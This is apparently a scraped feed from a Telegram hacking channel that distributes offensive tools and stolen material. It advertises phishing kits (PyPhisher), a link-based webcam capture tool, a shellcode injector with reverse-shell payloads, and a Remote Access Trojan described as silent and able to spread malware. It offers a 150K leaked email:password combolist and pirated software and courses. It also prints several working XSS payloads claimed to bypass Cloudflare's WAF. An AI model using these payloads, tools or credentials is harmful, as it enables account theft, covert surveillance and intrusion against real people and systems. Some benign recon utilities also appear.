Wordpress juicy endpoints

#Wordpress
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

🥷 PyPhisher 🥷

▶ A video of the pyphisher tool in action

💬
Ultimate phishing tool in python. Includes popular websites like facebook, twitter, instagram, github, reddit, gmail and many others.

⬇️ Download
👁‍🗨 Previous Post

#Python #PyPhisher
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

🎁Notcoin gives you a gift of 2.5k by entering the bot, and you can increase it during a series of games.
It has not yet been valued, but Pavel Drov (Telegram) has also supported this currency.

Its condition is like the beginning of the Toncoin currency, it has no price, try it for free, there is no harm, maybe one day Telegram itself will become valuable like Toncoin.

@notcoin_bot
💎

⚡️ CamPhish ⚡️

⚠️ The video tutorial is included in the file ⚠️

💬 Grab cam shots from target's phone front camera or PC webcam just sending a link

📊 Features:
⚪️ Festival Wishing
⚪️ Live YouTube TV
⚪️ Online Meeting [Beta]

🔼 Install:

sudo apt-get -y install php openssh git wget
cd CamPhish
bash camphish.sh

😸 Github

⬇️ Download
🔒 BugCod3

#Camera #Hacking #Video #learning
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

👁 Shellter 👁

⚠️ The video tutorial is included in the file ⚠️

💬 is a dynamic shellcode injection tool aka dynamic PE infector.

📊 Payloads List:
⚪️ meterpreter_reverse_tcp
⚪️ meterpreter_reverse_http
⚪️ meterpreter_reverse_https
⚪️ meterpreter_bind_tcp
⚪️ shell_reverse_tcp
⚪️ shell_bind_tcp
⚪️ WinExec
⚪️ and many other options...

😸 Github

⬇️ Download
🔒 BugCod3

#shellter #msf #payload #bind
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

🐶 SANS All Courses 🐶

💬
Cyber Security Courses, Training, Certifications and Resources
The SANS Promise: Everyone who completes SANS training can apply the skills and knowledge they’ve learned the day they return to work.

💸 Price : 100,000 $ Plus ✔️

📂 Size : 152.98 GB

⬇️ Download

#Sans #Courses
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

⚡️ Cloud7 Bot Exploit ⚡️

Run Script with Python 2.7

📊 Recommended:

python -m pip install requests
python -m pip install bs4
python -m pip install colorama
python -m pip install lxml

⬇️ Download
🔒 @LearnExploit

#Exploit #Tools
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

💣 assetfinder 💣

💬 Find domains and subdomains potentially related to a given domain.

🔼 Install:

go get -u github.com/tomnomnom/assetfinder

📂 Usage:

assetfinder [--subs-only] <domain>

😸 Github

⬇️ Download
🔒 BugCod3

#asset #finder #sub #domain
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

🧑‍💻 150K Israel Combolist 🇮🇱

💡 Format:
Email:Pass

⬇️ Download
🔒 BugCod3

#Combo #List #Israel
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

👩‍💻 16K+ ULTIMATE DEEPWEB/ONION LINKS + GUIDE 👩‍💻

⬇️ Download

#Deep #Web
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

💙 Burpsuite Pro 💙

📂 README (en+ru) included, plz read it before run BS.

🔼 Run with Java 18 (JDK for Win included)

⬇️ Download
🔒 311138

#Burpsuite #Pro #Tools
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

👻 steghide 👻

💬
Steghide is steganography program which hides bits of a data file in some of the least significant bits of another file in such a way that the existence of the data file is not visible and cannot be proven.

💡
Steghide is designed to be portable and configurable and features hiding data in bmp, jpeg, wav and au files, blowfish encryption, MD5 hashing of passphrases to blowfish keys, and pseudo-random distribution of hidden bits in the container data.

🕸 Steghide is useful in digital forensics investigations.

🔼 Install:
👩‍💻 Kali:

sudo apt install steghide

⬇️ Download (windows)
🔒 BugCod3

#Steghide #Tools
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

🕷 ExifTool 🕷

💬
Image::ExifTool is a customizable set of Perl modules plus a full-featured command-line application called exiftool for reading and writing meta information in a wide variety of files, including the maker note information of many digital cameras by various manufacturers such as Canon, Casio, DJI, FLIR, FujiFilm, GE, HP, JVC/Victor, Kodak, Leaf, Minolta/Konica-Minolta, Nikon, Nintendo, Olympus/Epson, Panasonic/Leica, Pentax/Asahi, Phase One, Reconyx, Ricoh, Samsung, Sanyo, Sigma/Foveon and Sony.

📊
The following modules/packages are recommended for specific features, e.g. decoding compressed and/or encrypted information from the indicated file types, calculating digest values for some information types, etc.:

⚪️ Archive::Zip / libarchive-zip-perl: ZIP, DOCX, PPTX,
XLSX, ODP, ODS, ODT, EIP, iWork

⚪️ Unicode::LineBreak / libunicode-linebreak-perl: for column-alignment of alternate language output

⚪️ POSIX::strptime / libposix-strptime-perl: for inverse date/time conversion

⚪️ Time::Piece (in perl core): alternative to POSIX::strptime

⚪️ IO::Compress::RawDeflate + IO::Uncompress::RawInflate (in perl core): for reading FLIF images

⚪️ Compress::Raw::Lzma / libcompress-raw-lzma-perl: for reading encoded 7z files

⚪️ IO::Compress::Brotli + IO::Uncompress::Brotli / libio-compress-brotli-perl: for writing/reading compressed JXL metadata

🔼 Install:
👩‍💻 Kali:

sudo apt install libimage-exiftool-perl

⬇️ Download 🔟👩‍💻👩‍💻
🔒 BugCod3

#Steghide #Tools
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

🦊 DalFox 🦊

💬
DalFox is a powerful open-source tool that focuses on automation, making it ideal for quickly scanning for XSS flaws and analyzing parameters. Its advanced testing engine and niche features are designed to streamline the process of detecting and verifying vulnerabilities.

🔼 Install:

go install github.com/hahwul/dalfox/v2@latest

💻 Usage:

dalfox [mode] [target] [flags]

👤 Single target mode:

dalfox url http://testphp.vulnweb.com/listproducts.php\?cat\=123\&artist\=123\&asdf\=ff \
  -b https://your-callback-url

👥 Multiple target mode from file:

dalfox file urls_file --custom-payload ./mypayloads.txt

🪟 Pipeline mode:

cat urls_file | dalfox pipe -H "AuthToken: bbadsfkasdfadsf87"

😸 Github

⬇️ Donwload
🔒 BugCod3

#Go #XSS #Scanner #Vulnerability #BugBounty
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

Cloudflare bypass XSS payloads

Tested On: 👩‍💻

XSS Payloads:

for(t?c.outerHTmL=o:i=o=’’;i++<1024;o+=`<code onclick=this.innerHTmL=’${M(i)?’*’:n||’·’}’>#</code>${i%64?’’:’<p>’}`)for(n=j=0;j<9;n+=M(i-65+j%3+(j++/3|0)*64))M=i=>i>64&i<960&i%64>1&C(i*i)>.7
javanoscript:{alert ‘0’ }
≋ "><!'/*"*\'/*\"/*--></Script><Image SrcSet=K */; OnError=confirm(document.domain) //># ≋
<noscript/OnLoad="`${prompt``}`">

#Exploit #XSS #Payload
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

New xss payload to bypass cloudflare WAF

<dETAILS%0aopen%0aonToGgle%0a%3d%0aa%3dprompt,a(origin)%20x>

#XSS #Payload #Bypass #CF #WAF
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

👣 haktrails 👣

💬
haktrails is a Golang client for querying SecurityTrails API data, sponsored by SecurityTrails.

📊 Tool Features:
⚪️ stdin input for easy tool chaining
⚪️ subdomain discovery
⚪️ associated root domain discovery
⚪️ associated IP discovery
⚪️ historical DNS data
⚪️ historical whois data
⚪️ DSL queries (currently a prototype)
⚪️ company discovery (discover the owner of a domain)
⚪️ whois (returns json whois data for a given domain)
⚪️ ping (check that your current SecurityTrails configuration/key is working)
⚪️ usage (check your current SecurityTrails usage)
⚪️ "json" or "list" output options for easy tool chaining
⚪️ "ZSH & Bash autocompletion"

🔼 Installation:

go install -v github.com/hakluke/haktrails@latest

💻 Usage:

Gather subdomains

cat domains.txt | haktrails subdomains
echo "yahoo.com" | haktrails subdomains

and...

😸 Github

⬇️ Download
🔒 BugCod3

#Go #Subdomain #IP #Discovery
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

Main sinks that can lead to DOM-XSS

#Javacript #Dom #XSS
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

🦎 Subprober 🦎

🔔 Subprober v1.0.5 - Fast Probing Tool for Penetration Testing

👁‍🗨 Overview:
Subprober v1.0.5 is a powerful and efficient tool designed for penetration testers and security professionals. This release introduces several enhancements, bug fixes, and new features to elevate your subdomain probing experience. Subprober facilitates fast and reliable information extraction, making it an invaluable asset for penetration testing workflows.

📊 Features:
⚪️ Subprober Concurrency and Accuracy are Improved with libraries like aiohttp,asyncio
⚪️ Subprober Error handling and Synchronization are improved
⚪️ Resolved some Bugs for Subprober
⚪️ Subprober Commands are changed with usefull flags
⚪️ Resolved executive errors in v1.0.4
⚪️ Subprober requires python version 3.11.x

🔼 Installation:
Method 1:

pip install git+https://github.com/sanjai-AK47/Subprober.git

Method 2:

cd Subprober
pip install .

💻 Basic Usage:

subprober -f subdomains.txt -o output.txt -tl -wc -sv  -apt -wc -ex 500 -v -o output.txt -c 20

😸 Github

⬇️ Download
🔒 BugCod3

#Subdomains #Scanner
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

👻 Ghost 👻

👻 RAT (Remote Access Trojan) - Silent Botnet - Full Remote Command-Line Access - Download & Execute Programs - Spread Virus' & Malware

💬
ghost is a light RAT that gives the server/attacker full remote access to the user's command-line interpreter (cmd.exe). They are allowed to execute commands silently without the client/zombie noticing. The server/attacker is also given the ability to download and execute files on the client/zombie's computer. This is also a silent and hidden process. Like most Remote Access Trojans, this download and execution ability helps distribute viruses and other pieces of malware.

👁‍🗨
This malware is distributed simply by running zombie.exe. This file name can be changed to whatever. There is no restriction. When run, it searches for the first two arguments (IP & Port). If neither is provided, the program doesn't run. With that being said, make sure you provide the server's IP and Port in the command-line arguments. Example:

zombie.exe 127.0.0.1 27015

📊 Features:
⚪️ Remote command execution
⚪️ Silent background process
⚪️ Download and run file (Hidden)
⚪️ Safe Mode startup
⚪️ Will automatically connect to the server
⚪️ Data sent and received is encrypted (substitution cipher)
⚪️ Files are hidden
⚪️ Installed Antivirus shown to server
⚪️ Easily spread malware through download feature
⚪️ Startup info doesn't show in msconfig or other startup checking programs like CCleaner
⚪️ Disable Task Manager

😸 Github

⬇️ Download
🔒 BugCod3

#Rat #Malware #Remote #Access
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

🕷 hakip2host 🕷

💬
hakip2host takes a list of IP addresses via stdin, then does a series of checks to return associated domain names.

📊 Current supported checks are:
⚪️ DNS PTR lookups
⚪️ Subject Alternative Names (SANs) on SSL certificates
⚪️ Common Names (CNs) on SSL certificates

🔼 Installation:

go install github.com/hakluke/hakip2host@latest

💻 Usage:

hakip2host --help

😸 Github

⬇️ Download
🔒 BugCod3

#Osint #Recon #CIDR #HTTPS
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3